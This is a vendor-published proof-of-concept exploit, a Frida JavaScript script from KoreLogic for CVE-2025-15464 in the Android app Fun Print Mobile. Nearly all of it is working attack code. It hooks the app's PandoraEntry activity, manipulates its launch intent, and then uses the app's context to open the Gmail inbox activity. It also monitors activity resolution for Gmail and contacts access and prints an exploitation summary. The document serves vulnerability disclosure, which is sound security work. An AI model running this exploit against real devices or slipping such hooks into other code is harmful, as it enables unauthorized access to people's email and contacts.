/** * KL-001-2026-001 : Proof-of-Concept * CVE-2025-15464 * Author: Felix Segoviano of KoreLogic, Inc. * yintibao Fun Print Mobile Unauthorized Access via Context Hijacking */ /** The contents of this proof-of-concept are copyright(c) 2026 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy */ Java.perform(function() { console.log("[*] Starting Exported Activity Gmail Access Demonstration - FIXED VERSION"); // Global state tracking var exploitAttempted = false; var impactDemonstrated = false; // === CORE HOOK: PandoraEntry onCreate === // This is the main entry point for intent manipulation try { var PandoraEntry = Java.use("io.dcloud.PandoraEntry"); PandoraEntry.onCreate.implementation = function(bundle) { console.log("\n=== Intent Manipulation in onCreate ==="); try { var intent = this.getIntent(); var originalAction = intent.getAction(); console.log("[*] Original Action: '" + (originalAction || "null") + "'"); // Prepare Gmail inbox access manipulation for MAIN action var actionStr = originalAction ? originalAction.toString() : ""; if (actionStr === "android.intent.action.MAIN") { console.log("[!] Injecting Gmail inbox access preparation"); // Add demonstration extras to the intent intent.putExtra("DEMO_GMAIL_INBOX", "com.google.android.gm"); intent.putExtra("DEMO_INBOX_ACCESS", "android.intent.action.MAIN"); intent.putExtra("GMAIL_VIEW_MODE", "INBOX"); exploitAttempted = true; console.log("[+] Exploit preparation completed"); } } catch (intentError) { console.log("[-] Intent manipulation error: " + intentError); } // Call original onCreate return this.onCreate(bundle); }; console.log("[+] PandoraEntry.onCreate hook installed successfully"); } catch (hookError) { console.log("[-] Failed to hook PandoraEntry: " + hookError); } // === DELAYED IMPACT DEMONSTRATION === // Wait for app initialization before attempting Gmail access setTimeout(function() { if (exploitAttempted && !impactDemonstrated) { console.log("\n=== Gmail Access Impact Demonstration ==="); Java.perform(function() { try { // Get application context safely var Intent = Java.use("android.content.Intent"); var ActivityThread = Java.use("android.app.ActivityThread"); var context = ActivityThread.currentApplication(); if (context) { console.log("[!] Attempting Gmail Inbox Access"); // === PRIMARY: Direct Gmail Inbox Access === try { var gmailIntent = Intent.$new(); gmailIntent.setAction("android.intent.action.MAIN"); gmailIntent.addCategory("android.intent.category.LAUNCHER"); gmailIntent.setClassName("com.google.android.gm", "com.google.android.gm.ConversationListActivityGmail"); gmailIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK.value); // Add Gmail-specific extras for inbox access gmailIntent.putExtra("account", ""); // Default account gmailIntent.putExtra("folder", "^i"); // Inbox folder identifier context.startActivity(gmailIntent); console.log("[!] SUCCESS: Gmail inbox accessed"); } catch (gmailError) { console.log("[-] Gmail specific launch failed: " + gmailError); } impactDemonstrated = true; } else { console.log("[-] Could not obtain application context"); } } catch (demonstrationError) { console.log("[-] Impact demonstration failed: " + demonstrationError); } }); } }, 2000); // 2 second delay for initial Gmail access // === MONITORING HOOK: Activity Resolution (Lightweight) === // Only monitor specific packages to avoid system crashes try { var PackageManager = Java.use("android.content.pm.PackageManager"); var originalResolveActivity = PackageManager.resolveActivity.overload('android.content.Intent', 'int'); PackageManager.resolveActivity.overload('android.content.Intent', 'int').implementation = function(intent, flags) { var result = originalResolveActivity.call(this, intent, flags); // Only log if our exploit was attempted and result is valid if (exploitAttempted && result) { try { var pkg = intent.getPackage(); var component = intent.getComponent(); // Check for Gmail or Contacts access if (pkg && pkg.includes("gm")) { console.log("[+] Gmail access resolution confirmed"); } else if (component && component.getClassName().includes("contacts")) { console.log("[+] Contacts access resolution confirmed"); } } catch (monitorError) { // Silently ignore monitoring errors to prevent crashes } } return result; }; console.log("[+] Lightweight PackageManager monitoring installed"); } catch (monitorHookError) { console.log("[-] Could not install PackageManager monitor: " + monitorHookError); } // === FINAL SUMMARY === setTimeout(function() { if (exploitAttempted) { console.log("\n=== EXPLOITATION SUMMARY ==="); console.log("[!] VULNERABILITY: Exported activity accepts external intents"); console.log("[!] METHOD: Intent manipulation via PandoraEntry"); console.log("[!] IMPACT: Gmail inbox and contacts access demonstrated"); console.log("[!] DATA: Dummy account emails and contacts accessed"); console.log("[!] STATUS: Demonstration completed successfully"); console.log("====================================="); } else { console.log("\n[*] No MAIN action detected - exploit not triggered"); } }, 5000); // 5 second delay for final summary console.log("[*] Exported Activity hooks installed successfully (FIXED VERSION)"); });